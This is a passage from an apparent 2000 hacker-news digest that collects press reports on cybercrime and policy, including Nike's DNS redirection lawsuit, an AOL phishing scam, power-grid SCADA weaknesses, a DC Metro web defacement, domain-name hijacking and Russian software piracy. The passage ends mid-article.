      The Arizona Republican Senator John McCain is still pushing for
      content filtering at the nations public libraries. He has added an
      amendment onto the Labor appropriations bill that requires schools and
      libraries receiving E-rate funding use filters to block Internet
      content that is "inappropriate for minors."
      
      Wired
      Summary & Status of S. 3635
      
      http://www.wired.com/news/politics/0,1283,37259,00.html
      http://thomas.loc.gov/cgi-bin/bdquery/z?d106:SP03635:
      @HWA
      
 237.0 [HNN] Jun 29'00 Lawsuit Filed Over Nike Redirection 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Weld Pond 
      When Nike's website was redirected by attackers last week it routed
      the traffic through a small web hosting company. That company is now
      suing Nike claiming they where negligent in securing their systems.
      Nike says that if anyone is to blame it is Network Solutions who
      allowed the redirection to occur in the first place. The perpetrator
      of the redirection remains unidentified. (Regardless of how this case
      is decided it will set an interesting precident either way.)
      
      Wired
      
      http://www.wired.com/news/politics/0,1283,37286,00.html
      @HWA
      
 238.0 [HNN] Jun 29'00 eCrime Documentary 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Evil Wench 
      The story of Tim Lloyd, accused and convicted of deleting files and
      thereby destroying the business of his employer is laid out in a blow
      by blow fashion in the article. We have reported on Lloyd before and
      described how he has been found guilty of industrial sabotage of Omega
      Engineering Corp. Now there is a step by step account of how the
      Secret Service got their man.
      
      CNN
      
      http://www.cnn.com/2000/TECH/computing/06/27/omega.files.idg/index.htm
      l
      @HWA
      
 239.0 [HNN] Jun 29'00 E-mail Used As Evidence In Korea 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Evil Wench 
      Officials at the Seoul District Prosecutor's Office said they arrested
      32-year-old Kim Sang-hoon, a computer software developer, on charges
      of violating a law governing information-telecommunications networks.
      Kim allegedly stole some 4,600 files from a Web-hosting firm's server.
      One of the witnesses in the case was allowed to send his testimony to
      the court via email.
      
      Korea Herald
      
      http://www.koreaherald.co.kr/news/2000/06/__02/20000629_0213.htm
      @HWA

 240.0 [HNN] Jun 30'00 AOL Users Subjected to Social Engineering 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by William Knowles
      Two 15-year-olds in Wichita, Kansas allegedly tricked some AOL users
      into revealing credit card numbers. Victims received an e-mail from
      "Steve Case" of the "AOL Billing Team" requesting that they go to a
      web site to update their user information. The requested information
      included providing a credit card number "that has not been used for
      any AOL services," the message read. Steve Case, of course, is not a
      member of any billing teams but rather is AOL's president and CEO. An
      AOL official said that the company never asks for users' passwords or
      credit card numbers.
      
      APB News
      
      http://www.apbnews.com/newscenter/breakingnews/2000/06/29/aolscam0629_
      01.html
      @HWA
      
 241.0 [HNN] Jun 30'00 ZDNet Launches Echelon Study 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Pyle 
      In a series of articles by Duncan Campbell and other contributors,
      ZDNet is taking a closer look at the Echelon global spying network.
      "Echelon: World Under Watch" is a collection of 16 reports that
      include such topics as proof of Echelon's existence, an explanation of
      how Echelon works, and various attempts by governments to maintain the
      secrecy of the project. Public awareness of such far-reaching
      government snooping capabilities could lead to further efforts by
      citizens to protect their privacy.
      
      ZDNet
      
      http://www.zdnet.co.uk/news/specials/2000/06/echelon/
      @HWA
      
 242.0 [HNN] Jun 30'00 Interpol and Atomic Tangerine Announce Collaboration 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Weld Pond 
      U.S. venture consulting firm Atomic Tangerine has established a
      cooperative agreement with Interpol to exchange intelligence on
      cybercrime. Atomic Tangerine proposes to pass along Interpol's
      intelligence to any bona fide company free of charge. In exchange,
      Interpol will have access to information gathered by Atomic
      Tangerine's "Net Radar."
      
      Reuters - via Excite
      
      http://news.excite.com/news/r/000629/15/net-security-dc
      @HWA
      
 243.0 [HNN] Jun 30'00 Survey Results Show That Precautions Lag Concerns 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Apocalypse Dow
      Consumers and professionals alike are plenty concerned about being
      victimized by cybercrime, but only a fraction of them use firewalls on
      their personal computers. Many people surveyed update their antivirus
      software at least once per month but generally fail to take further
      precautions. (Why not install a firewall or learn about security
      before starting a business?)
      
      Newsbytes.com
      
      http://www.newsbytes.com/pubNews/00/151446.html
      @HWA
      
 244.0 [HNN] Jun 30'00 Student Confesses to Numerous Private and Government Attacks 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by William Knowles
      A former computer science student at Northeastern University admitted
      to computer break-ins at the Defense Logistics Agency, NASA, and the
      Interior Department among others. The federal prosecutor in the case
      sought a harsh penalty as discouragement to other such crimes, but
      under a plea agreement the man will serve a maximum of six months.
      
      AP - via Techserver
      
      http://www.techserver.com/noframes/story/0,2294,500222509-500318460-50
      1790855-0,00.html
      @HWA
      
 245.0 [HNN] Jun 30'00 Threat From Russia? 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Pyle 
      A Thursday New York Times article describes the bleak employment scene
      in Russia as a perfect breeding ground for cyber-criminals. In a
      profile of one bored Russian teenager, "Dr. Linux," the article
      describes instances of internet petty crime as part of a growing
      interest among Russians with an interest in computers and a lot of
      free time. Numerous Russians interviewed claimed that the media have
      exaggerated the importance of recent Russian attacks as part of a
      "cold war mentality."
      
      New York Times - registration required (free)
      
      http://www10.nytimes.com/library/tech/00/06/circuits/articles/29hack.h
      tml
      @HWA
      
 246.0 [HNN] Jun 30'00 Zines Update 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      b0g issue 6 just released!

      NOV - Issue 9 is out now and still going strong.
      
      b0g
      
      http://www.b0g.org/
      @HWA

         
      

      
 247.0 [IND] May 26th: Lights Out
       ~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      May 26 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052600a_j.shtml     
           
      
      5/26/00
      Lights Out
      
      A year in the making, NIPC's Michael Vatis unveils a plan to monitor cyber
      attacks on the power grid. Is it enough to prevent a blackout? 
      By Kevin Poulsen
      
      May 25, 2000 11:36 PM PT
      
      The FBI's National Infrastructure Protection Center (NIPC) will be the hub 
      of a nationwide alert network designed to react quickly against cyber 
      attacks targeting the computerized controls of the North American power 
      grid, in a pilot program announced by NIPC chief Michael Vatis to a Senate 
      committee Thursday.

      Vatis unveiled the "Electrical Power Indications and Warning System" in 
      his written testimony to the full Senate       Judiciary committee as it 
      conducted a hearing on cybercrime. "Under the pilot program, electric 
      utility companies and other power entities transmit cyber incident reports 
      to the NIPC," Vatis testified. "These reports are analyzed and assessed to 
      determine whether an NIPC warning, alert, or advisory is warranted to the 
      electric utility
      community."
      
      More>>http://www.securityfocus.com/news/41 
      
      Lights Out A year in the making, NIPC's Michael Vatis unveils a plan to 
      monitor cyber attacks on the power grid. Is it enough to prevent a 
      blackout? By Kevin Poulsen May 25, 2000 11:36 PM PT

      The FBI's National Infrastructure Protection Center (NIPC) will be the hub 
      of a nationwide alert network designed to react quickly against cyber 
      attacks targeting the computerized controls of the North American power 
      grid, in a pilot program announced by NIPC chief Michael Vatis to a Senate 
      committee Thursday.

      Vatis unveiled the "Electrical Power Indications and Warning System" in 
      his written testimony to the full Senate Judiciary committee as it 
      conducted a hearing on cybercrime. "Under the pilot program, electric 
      utility companies and other power entities transmit cyber incident reports 
      to the NIPC," Vatis testified. "These reports are analyzed and assessed to 
      determine whether an NIPC warning, alert, or advisory is warranted to the 
      electric utility community."

      The FBI established the program in concert with the North American 
      Electrical Reliability Council (NERC), a not-for-profit industry group 
      that umbrellas electric utilities in the U.S. and Canada. "We've been 
      working with NIPC over the past year, maybe a little longer, to develop 
      the program," said Eugene F. Gorzelnik, NERC's communications director. 
      Gorzelnik said the program is being tested by one of the nine regional 
      councils that make up NERC, but declined to say which one. "They've been 
      working through some of the bugs, and we've had several utilities around 
      the country volunteer to participate as well," Gorzelnik said.

      NERC formed in the wake of the catastrophic November 9, 1965 blackout that 
      knocked-out power to 30 million people in the Northeastern United States 
      and Ontario, Canada for as long as thirteen hours. Runway landing lights 
      went dark, people were trapped in elevators, traffic snarled at busy 
      intersections that were suddenly left without signals. Decades before 
      buzzwords like "critical infrastructure" and "cyberterrorism" would enter 
      the vernacular, President Lyndon Johnson viewed the blackout as a national 
      security matter and set the FBI and the Pentagon to investigate. Utility 
      engineers eventually traced the genesis of the cascading outage to the 
      failure of a single relay in a transmission line.       'Utility 
      operations personnel interviewed believed that firewalls and dial-back 
      modems were sufficient to protect their systems from intruders.' -- White 
      House report Today, the "Great Northeast Blackout" influences the most 
      popular cyberterror fears. The inevitable hacker-induced blackout goes 
      with the hacker-induced 911 outage as a central doctrine for executive, 
      congressional and industry believers who say that cyberterrorism is a 
      serious and immediate threat to the Western World. National Security 
      Council Terrorism Coordinator Richard Clarke put it this way to the New 
      York Times: "You black out a city, people die. Black out lots of cities, 
      lots of people die. It's as bad as being attacked by bombs." 

      Actual incidents of computer-based attacks against the power grid are hard 
      to find. While the past two decades have seen no shortage of attacks on 
      critical infrastructures -- including a hacker taking over an HBO 
      broadcast through a communications satellite, a group trespassing into the 
      computers controlling a Time Warner cable system, and intruders of all 
      types routinely gaining influence over huge swaths of the telephone 
      network -- tales of intrusions into electric utilities remain apocryphal. 
      An October Wall Street Journal report on the 1995 Dallas "Phone Masters" 
      case included a casual paragraph-eight disclosure that the three hackers 
      involved "had access to portions of the national power grid," but no such 
      charges were filed against the defendants, who admitted to cracking 
      telephone company computers, and the prosecutor on the case denies it. "I 
      don't remember any example of them accessing the power grid," said former 
      Assistant U.S. Attorney Matt Yarbrough, now with a Dallas law firm.

      The electric industry is closed mouthed on the question. "When it comes to 
      saying something specific about whether anything has happened on the 
      electric system, I don't answer," said Gorzelnik. Asked to what degree the 
      power grid is vulnerable to such an assault, Gorzelnik said, "I just won't 
      answer that question. It's not something that we want to talk about in the 
      press. It doesn't serve any useful purpose."

      But a detailed 1997 report by the White House's National Security 
      Telecommunications Advisory Committee paints a sobering picture.


      Open Modems  
      
                           The committee's Electric Power Risk Assessment was 
      conducted at the request of President Clinton, and involved six months of 
      investigation and interviews with workers at eight utilities and three 
      industry groups, including NERC. While the report concluded that physical 
      destruction of electric facilities was a far greater threat than online 
      attacks, it also described a power grid controlled by Byzantine systems 
      riddled with basic security holes.

      Networks controlling critical portions of the grid were accessible through 
      corporate LANs, the report said. Digital circuit breakers could be 
      remotely tripped by anyone with the right phone number. Fixed passwords 
      for remote vendor access went unchanged for years. Of particular concern 
      to the committee was the widespread use of unsecured supervisory control 
      and data acquisition (SCADA) systems. The SCADA systems consist of central 
      hosts that can monitor and control smaller Remote Terminal Units (RTUs) 
      sprinkled throughout the grid, which in turn control power flow at any 
      given point. Many RTUs in electrical substations were accessible through 
      telephone dial-ups, some of which were protected only with dial-back 
      systems -- modems that call a user back at a pre-programmed number before 
      granting access -- while others lacked even that weak security mechanism 
      and were accessable to anyone who found the telephone number. "An intruder 
      could dial into this port and issue commands to the substation equipment," 
      the report notes.

      "Open sources, including... electric industry publications, regional maps, 
      and the Internet would provide enough information to identify the most 
      heavily loaded transmission lines and most critical substations in the 
      power grid," reads the report. "Relatively simple hacking techniques could 
      then be used to locate dial-in ports to these points and modify settings 
      to trigger an outage."

      Overall, the report found that that utility workers "believed that 
      firewalls and dial-back modems were sufficient to protect their systems 
      from intruders, and they were surprised to learn about the experiences of 
      the telecommunications industry with hackers defeating these measures."

      An engineer with a company that manufactures SCADA systems in use at major 
      electric utilities, speaking on condition that neither he nor his company 
      be identified, said that in recent years the government has spurred 
      electric utilities to increased security. But his company's SCADA products 
      still include dial-up support, and the security features are identical to 
      the ones criticized as weak in the 1997 report. "You can have the remote 
      unit call back to verify that the number is correct," he said. "There are 
      security checks in many areas across the system, via protocols, via 
      passwords... So I'd say it's safe. At least, it's not completely open." 

      "Everything you see in computer security is being applied here. There are 
      utilities that deem it necessary and are applying it. Is every utility 
      applying it? No. But at least [the government] is pushing to see that 
      utilities do it," he said.

      NERC's Gorzelnik wouldn't comment on whether the power grid is any more 
      secure now than in 1997. The Electrical Power Indications and Warning 
      System does nothing to prevent attacks, but rather provides a channel for 
      electric utilities to report attacks they detect directly to NIPC. "With 
      the information NIPC receives, they'll be able to see if there's any kind 
      of trend developing, to see if there's a more serious problem," said 
      Gorzelnik. "They wouldn't just be looking at the power sector, but also 
      banking, telecommunications and other infrastructure sectors" for signs of 
      a coordinated attack, Gorzelnik said.

      The program will go nationwide this fall, and in Thursday's testimony 
      Vatis promised the Senate that it will be a model for similar programs to 
      monitor intrusions into other critical infrastructures. "We are currently 
      working with industry on a Indications and Warning model for the 
      telecommunications sector."

      
      @HWA
      
 248.0 [IND] May 30th Anti-Metallica Hackers Hit DC Metro Web Site
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      May 30 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_053000a_j.shtml     
      
      5/30/00
      Anti-Metallica Hackers Hit DC Metro Web Site
      By Phuong Ly, Washington Post
      WASHINGTON, DC, U.S.A.,
      30 May 2000, 6:14 AM CST
      
      A computer hacker vandalized the DC Metro's Web site for at least five 
      hours Monday by replacing transit information with an X-rated message 
      lashing out at recording artists who have filed lawsuits to stop people 
      from swapping music files over the Internet.

      The attack, the first for Metro, illustrated how vulnerable many public 
      Internet sites have become to being exploited by vandals.

      Murray Jacobson, manager of Metro's information technology division, said 
      that it was unclear how many users saw the obscene message but that the 
      effect on Metro customers probably was minimal because it occurred on a 
      holiday.

      On a typical weekday, Metro's Web site records about 200,000 visits, some 
      from people accessing the site more than once, according to Cheryl 
      Johnson, a Metro spokeswoman. The site includes a ride guide with maps to 
      help people plan their commutes, and it also allows passengers to buy 
      "smart cards" that store up to $200 in parking and fares. Jacobson said 
      there appeared to be no security breach enabling the hacker to obtain 
      credit card numbers.

      "It did not seem like they were out to destroy a computer system," 
      Jacobson said. "They knew what they could get away with quickly."

      Metro transit police and D.C. police will investigate the incident, which 
      also will be reported to the FBI, Jacobson said.

      Like many Web sites, Metro might have been hit simply because the hackers 
      - whether youths fooling around on a home computer or people who wanted to 
      make a political statement - thought the site could be disrupted, said 
      Mark Rasch, a former federal prosecutor and security consultant with 
      Reston-based Global Integrity.

      About 30 to 50 Web sites are hacked each week, he said. "It's just a site 
      of opportunity," Rasch said of the attack on Metro. "Even if you're not 
      doing anything particularly controversial with your Web site, it may be 
      used to make a political statement."

      In February, some of the Web's most prominent sites - including Yahoo, 
      eBay and Amazon.com - were paralyzed. In April, a 15-year-old Canadian 
      computer whiz known online as "Mafiaboy" was the first person charged in 
      those cyber-strikes.

      Metro's hackers identified themselves as "Idk2k," or "immortal daemon 
      killers," and started their message with "welcome to the year of 
      knowledge." They called the practice of vandalizing Web sites "lame" but 
      necessary because musicians were suing Napster, a popular computer program 
      that allows people to download music. The profanity-filled message berated 
      the rapper Dr. Dre and the heavy metal band Metallica, who have sued 
      Napster and have been particularly outspoken against the company.

      Recently, in chat rooms and message boards, hackers have been seething 
      about the lawsuits, Rasch said. But no other attacks concerning Napster 
      have been reported over the weekend, said representatives at the federally 
      funded CERT Coordination Center at Carnegie Mellon University, which 
      monitors hacker attacks and helps develop responses to them.

      Metro officials discovered that their site had been vandalized about 9:30 
      a.m. Monday and called in tech support staff to change passwords and 
      restore the site, Jacobson said.

      By 3 p.m., Metro's site was running properly and the focus turned to 
      finding the culprits and preventing another attack, Jacobson said.

      Yesterday, Jacobson tried to find a silver lining in the attack. "It's 
      kind of good to know these things happen every once in a while," he said. 
      "It educates our internal users because you know people out there are 
      doing malicious attacks. It's never pleasant, but you want to prepare for 
      the future."
      
      Copyright (C) 2000, The Washington Post. Reprinted with permission. 
      
      @HWA
      
  249.0 [IND] June 1st Hackers Drawn By The Thrills, The Challenge or Just Plain Cash 
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 1 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060100a_j.shtml     
      
      6/01/00
      Hackers Drawn By The Thrills, The Challenge or Just Plain Cash 
      Experts discuss motives behind cybercrimes
      By David McHugh
      Special for USA TODAY
      
      MOSCOW -- Alexei of St. Petersburg cracked his first program when he was 
      12. Frustrated by a game he couldn't win on his parents' computer, which 
      ran on an Intel 8086 microprocessor, he poked around in the game's 
      programming to make it easier.

      Now 20, the technical institute dropout cracks software to order for $50 
      to $200, defeating security measures, so illegal copies will run on 
      additional computers. He charged one businessman $50 to crack a $3,000 
      program for automating embroidering machines.

      His mother, with whom he lives, doesn't approve. ''So we try not to cross 
      paths on this topic,'' he says.

      Alexei, who declined to give his last name, swaps pirated software under 
      his nickname, Spot, on closed Internet sites limited to members of his 
      group, ScUM (''I forget what it stands for.''). He has never met most of 
      the members in person. Cracking presents an intellectual pleasure, he 
      says. ''A sporting interest, I would say.''

      With many companies reluctant to hurt their reputation by reporting 
      security breaches to police, private systems specialists often lead the 
      uphill fight against hackers. One of them is Sergei Gruzdev, general 
      director for Israeli-based Aladdin Software Security's Moscow office.

      Gruzdev, who admits he wrote viruses in his student days, says he's shut 
      down 35 Web sites where hackers were sharing cracked software and hacking 
      tools. Usually, a call to the Internet provider supporting the site does 
      the trick.

      But Gruzdev sicced the police on the United Crackers League, a St. 
      Petersburg-based group that had figured out how to defeat one of Aladdin's 
      security devices. One of its members, Andrei Lishutin, known as Leshy 
      (''Wood devil'' in Russian) was arrested. After that, the group renamed 
      itself United Copyright Protection/Cryptography Labs and says it is now 
      committed to fighting hackers.

      Hackers, Gruzdev says, ''have the attitude (that) 'I don't want to pay $50 
      to Bill Gates or to Western bourgeois software developers.' It's the 
      psychology of poor people.''

      Some hackers use their skills to make money legally. Aladdin special 
      projects manager Alexei Raevsky, 26, started out by cracking a program for 
      fun when he was a freshman at Moscow's Institute of Physics and 
      Engineering. A classmate handed him a software disk protected by a widely 
      used security program, saying ''You're a hacker, hack this.''

      Raevsky, who was writing programs in 10 computer languages by the time he 
      left high school, studied the security measure ''to test my skills. I 
      cracked it, naturally.'' Then he wrote the software maker in Germany, 
      detailing the flaws. The firm responded by giving him contract work and a 
      top-of-the-line laptop computer -- a luxury among Moscow students.

      Now he drives a Volvo and owns his own apartment, an upper-middle-class 
      standard of living. ''We have the American approach -- if you're so smart, 
      where's your money?'' he says. ''Some waste time on breaking up Web sites, 
      and my attitude is, why do that if there's no money in it?'' 
      
      @HWA
      
250.0 [IND] Web Hijackers Pilfer Internet Domain Names
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 1 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060100b_j.shtml     
      
      6/01/00 
      
      Web Hijackers Pilfer Internet Domain Names
      By Ian Karleff
      
      TORONTO (Reuters) - Cyberspace hijackers have stolen the Internet domain 
      name Web.net, a hosting site for 700 charities, from its Canadian owners, 
      exposing yet another of the Internet's security flaws and jeopardizing the 
      Web's most valuable property -- your e-identity.

      ``This looks like international domain name laundering. I think we're 
      going to start seeing more of this,'' said Ken Campbell, president of K.K. 
      Campbell Internet Consulting in Toronto, and the first to discover 
      Web.net's predicament.

      Earlier this week, hijackers forged, or in Web language ''spoofed,'' 
      Web.net's e-mail account, explained Campbell.

      The hijackers also made crucial changes to the database of Network 
      Solutions, where Internet addresses are registered, and changed the 
      official owner of Web.net to Billy Tandoko of Jakarta, Indonesia.

      The hijackers then moved Web.net's registry to a micro-registrar in 
      Toronto and changed the legal owner to Paul Vernon, allegedly of Hong 
      Kong, and rerouted all traffic to reserveme.com.

      Web.net is still not in control of its Web site, although as of Wednesday 
      reserveme.com began redirecting mail and Web site inquiries back to 
      Web.net's servers, said Tonya Hancherow of Web Networks, the legal owner 
      of Web.net.

      The same hijackers made similar changes to the ownership of Bali.com, and 
      Campbell has since uncovered one more case of Web site hijacking, but does 
      not think the third case is linked.

      Hancherow said she can't believe such a breach of security is as easy as 
      spoofing an e-mail account.

      ``No password was provided and Network Solutions processed the change 
      without consent,'' said Hancherow.

      The hijackers motives are still a mystery.

      ``I think I'm witnessing an Internet version of international money 
      laundering, whereby someone is scooping up domain names worth $100,000 
      each, moves them around so the paper trail is lost, and ends up with 
      substantial assets,'' said Campbell.

      Hancherow first thought the hijacker was going to try to extort money from 
      Web Networks, but their non-profit status could complicate such a demand.

      ``The other two options: Is he trying to steal it so he can resell it, or 
      is he just trying to play games to make our lives a bit more difficult?'' 
      said Hancherow.

      Brian O'Shaughnessy, a spokesman for Network Solutions, told Reuters this 
      type of hijacking has happened at least a dozen times in the past year and 
      Web Networks is a victim of the excessive volume his company is 
      experiencing from people registering domain names.

      ``A new dot-com is added every 5 seconds. Domain names are a valuable 
      piece of property and that's what people are looking for: a valuable 
      identity on the Internet,'' said O'Shaughnessy.

      ``The rightful owner still has the domain. An unlawful act has been 
      committed using a hole in the system,'' he added.

      With the introduction of competition to the domain name registry field in 
      June 1999, a complex layer has been added to the system, making hijacking 
      easier, said O'Shaughnessy.

      Nevertheless, Campbell believes those businesses that have suffered 
      substantial losses due to hijacking may want to take Network Solutions to 
      court.

      Campbell warned that there was no longer a central administrator guarding 
      the Internet's security, as there was before 1993, when the Clinton 
      administration transformed the Internet from academic tool to commercial 
      medium.

      ``They took away those kind of feudal lords and brought in the naked 
      system that is not very secure,'' said Campbell. ``The Internet was based 
      on a co-operative environment, not a fiercely competitive capitalistic 
      environment, and that's why these problems perennially show up.'' 

      @HWA
      
251.0 [IND] High-Tech Crooks Thrive in Russia
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060100c_j.shtml     
      
      6/02/00
      High-Tech Crooks Thrive in Russia
      By David McHugh, Special for USA TODAY 06/01/00
      
      MOSCOW - The open-air Gorbushka market is the Alice's Restaurant of 
      software. You can get anything you want.

      Laid out on tables under the trees of a Moscow park - as if at a huge yard 
      sale - are row upon row of compact discs. The discs are crammed with 
      pirated versions of expensive programs worth hundreds or thousands of 
      dollars. Vendors offer everything from Microsoft's Windows 98 operating 
      system to computer-assisted-design and voice-recognition software.

      Here, though, they're on sale for 75 rubles, or about $2.75, a disc. It's 
      all illegal, but who's noticing?

      Russia's anarchic computer culture is fertile ground for hacking, piracy, 
      credit-card fraud and other digital crime. Gorbushka, with its vendors 
      hustling at makeshift tables, is just one of the more obvious examples.

      Russia has only about 1.5 million Internet users, a small number when 
      compared with the estimated 110 million in the USA. But among them are 
      some of the world's busiest digital vandals, pirates, thieves and spies. 
      Their victims include the wealthy and powerful: Microsoft, whose software 
      is widely pirated here, America Online, the Pentagon, Citibank.

      Police say the number of computer-related crimes continues to rise in 
      Russia. More than 200 cases were reported in the first three months of 
      this year - more than in all of 1999.

      Typical computer crimes include stealing credit card numbers sent to 
      online businesses, software piracy, stealing passwords to get free time 
      online and theft of business information. 

      Some examples:
      
      
      Police arrested five suspected hackers accused of stealing credit-card 
      numbers from Internet retailers and pocketing more than $630,000, the 
      ITAR-Tass news agency reported last month. The group, which operated from 
      December to April, stole numbers from more than 5,400 cards belonging 
      mostly to foreigners, police said.

      
      Working with an insider, hackers bypassed the security system of the huge 
      natural gas monopoly Gazprom last year and temporarily seized control of 
      the system that regulates gas flows in pipelines, according to the 
      Interior Ministry. Officials did not say whether the break-in caused any 
      damage.

      
      A Russian hacker going by the name Maxus distributed more than 25,000 
      credit-card numbers stolen from an online store, CDUniverse.com. Most of 
      the records were from accounts in the USA, where 65% of the company's 
      customers live. Maxus tried to extort money from the company in January; 
      he sent an e-mail in which he said he had breached the security of a 
      popular credit-card processing program and stole 300,000 customer records. 
      As far as the company knows, he was never caught. 

      
      Hundreds of PIN codes giving access to credit- and debit-card accounts 
      apparently were stolen in mid-1999 after a security breach at a Moscow 
      card-processing center. Cardholders often had their checking accounts 
      cleaned out in an unusual example of bulk PIN theft.

      
      America Online and Compuserve shut down local Internet access numbers in 
      Moscow in 1997 because of what the company called "intolerable levels of 
      fraud." 

      
      In one of the world's first online theft cases to be prosecuted, Vladimir 
      Levin of St. Petersburg was sentenced to three years in a U.S. prison for 
      stealing $3.7 million from Citibank accounts in 1995 using a personal 
      computer. He was arrested in Britain and extradited to the USA.

      
      Hackers apparently working from Russia rummaged in Department of Defense 
      computers for more than a year and stole reams of information. No 
      top-secret material was stolen, the Pentagon says. Computers at NASA and 
      Energy Department nuclear weapons labs also were raided. Investigators 
      don't know who was behind the attack, but some say they suspect Russian 
      intelligence services. Russia's Foreign Intelligence Service has denied 
      it. The agency says it would be too obvious to hack from inside Russia.

      Why does so much mischief emanate from Russia? The hacker problem begins 
      in school, where hacking habits are rife, Russian computer professionals 
      say. 

      During Soviet times, the government and universities actually encouraged 
      people to copy Western software.

      Sometimes lacking the printed data that come with store-bought software, 
      people began taking programs apart to see how they worked. "People had to 
      hack programs to learn them and adapt them to Soviet technical 
      conditions," says Mikhail Salnikov, head of Compulog computer consultants 
      and a veteran of the early days of personal computers in Russia.

      The Soviet government, by copying Western computer technology rather than 
      developing its own versions, was the first hacker, Salnikov says. Combine 
      that with Russia's high level of technical education and the result is a 
      culture in which many people think copying software is no big deal. Those 
      people also have the skills to steal passwords or defeat software security 
      features designed to thwart copying.

      Maj. Dmitry Chepchugov, head of the Interior Ministry's elite 
      anti-computer crime unit, says poverty plays a role, especially in 
      password theft. "We have many people who need the Internet but don't have 
      the money," he says. So they piggyback on someone else's access.

      Otherwise honest people, he says, see nothing wrong in illegal copies, 
      especially when a legal copy can cost a month's wages. "It's only in the 
      past four years that people have begun to see the theft of intellectual 
      property as the same as the theft of real property," he says. "It's an 
      intellectual - and a generational - problem."

      In hopes of wresting some of the bigger customers away from the Gorbushka, 
      manufacturers conduct aggressive education campaigns about software 
      compliance in Russia's corporate sector. However, education among Russian 
      software users might not be enough to stop the threat Russian software 
      thieves present.

      Macromedia, a San Francisco-based company that produces Web-design 
      software, is not a major player in the Russian market. Still, it can't 
      afford to ignore piracy here. Steve Wozniak, director of the company's 
      anti-piracy programs, says Macromedia software has been sold over the 
      Internet from Russia to customers in the West. Russians also have set up 
      Web sites that give away "cracks" for Macromedia software - essentially 
      providing the intellectual tools for would-be pirates.

      Russia rivals China for world leadership in software piracy; about 92% of 
      business software running on Russian machines is estimated to be bootleg, 
      according to the Business Software Alliance, a U.S.-based industry group. 
      Recent estimates put the value of the stolen software at $273 million.

      That's not to say corporations aren't making any money in Russia. "By 
      selling only to 8% of potential customers, Microsoft-Russia sales are 
      about $25 million," says Eugene Danilov, Microsoft-Russia's marketing 
      manager. "Imagine what additional revenue could be generated if piracy was 
      reduced to 80%, 70%."
      
      Contributing: Sarah Karush 
      
      http://www.usatoday.com/life/cyber/tech/cti004.htm 
      
      06/01/00- Updated 11:15 AM ET
       
      
       High-tech crooks thrive in Russia
      By David McHugh, Special for USA TODAY
      
      MOSCOW - The open-air Gorbushka market is the Alice's Restaurant of 
               software. You can get anything you want.
      
       
      Moscow's Gorbushka market, featuring illegal copies of the latest 
      software, is just one example of Russia's free-for-all computer culture. 
      (AP) Laid out on tables under the trees of a Moscow park - as if at a huge 
      yard sale - are row upon row of compact discs. The discs are crammed with 
      pirated versions of expensive programs worth hundreds or thousands of 
      dollars. Vendors offer everything from Microsoft's Windows 98 operating 
      system to computer-assisted-design and voice-recognition software.

      Here, though, they're on sale for 75 rubles, or about $2.75, a disc. It's 
      all illegal, but who's noticing?

      Russia's anarchic computer culture is fertile ground for hacking, piracy, 
      credit-card fraud and other digital crime. Gorbushka, with its vendors 
      hustling at makeshift tables, is just one of the more obvious examples.

      Russia has only about 1.5 million Internet users, a small number when 
      compared with the estimated 110 million in the USA. But among them are 
      some of the world's busiest digital vandals, pirates, thieves and spies. 
      Their victims include the wealthy and powerful: Microsoft, whose software 
      is widely pirated here, America Online, the Pentagon, Citibank.

      Police say the number of computer-related crimes continues to rise in 
      Russia. More than 200 cases were reported in the first three months of 
      this year - more than in all of 1999.

      Typical computer crimes include stealing credit card numbers sent to 
      online businesses, software piracy, stealing passwords to get free time 
      online and theft of business information. 

      Some examples:

      Police arrested five suspected hackers accused of stealing credit-card 
      numbers from Internet retailers and pocketing more than $630,000, the 
      ITAR-Tass news agency reported last month. The group, which operated from 
      December to April, stole numbers from more than 5,400 cards belonging 
      mostly to foreigners, police said.

      Working with an insider, hackers bypassed the security system of the huge 
      natural gas monopoly Gazprom last year and temporarily seized control of 
      the system that regulates gas flows in pipelines, according to the 
      Interior Ministry. Officials did not say whether the break-in caused any 
      damage.

      A Russian hacker going by the name Maxus distributed more than 25,000 
      credit-card numbers stolen from an online store, CDUniverse.com. Most of 
      the records were from accounts in the USA, where 65% of the company's 
      customers live. Maxus tried to extort money from the company in January; 
      he sent an e-mail in which he said he had breached the security of a 
      popular credit-card processing program and stole 300,000 customer records. 
      As far as the company knows, he was never caught. 

      Hundreds of PIN codes giving access to credit- and debit-card accounts 
      apparently were stolen in mid-1999 after a security breach at a Moscow 
      card-processing center. Cardholders often had their checking accounts 
      cleaned out in an unusual example of bulk PIN theft.

      America Online and Compuserve shut down local Internet access numbers in 
      Moscow in 1997 because of what the company called "intolerable levels of 
      fraud." 

      In one of the world's first online theft cases to be prosecuted, Vladimir 
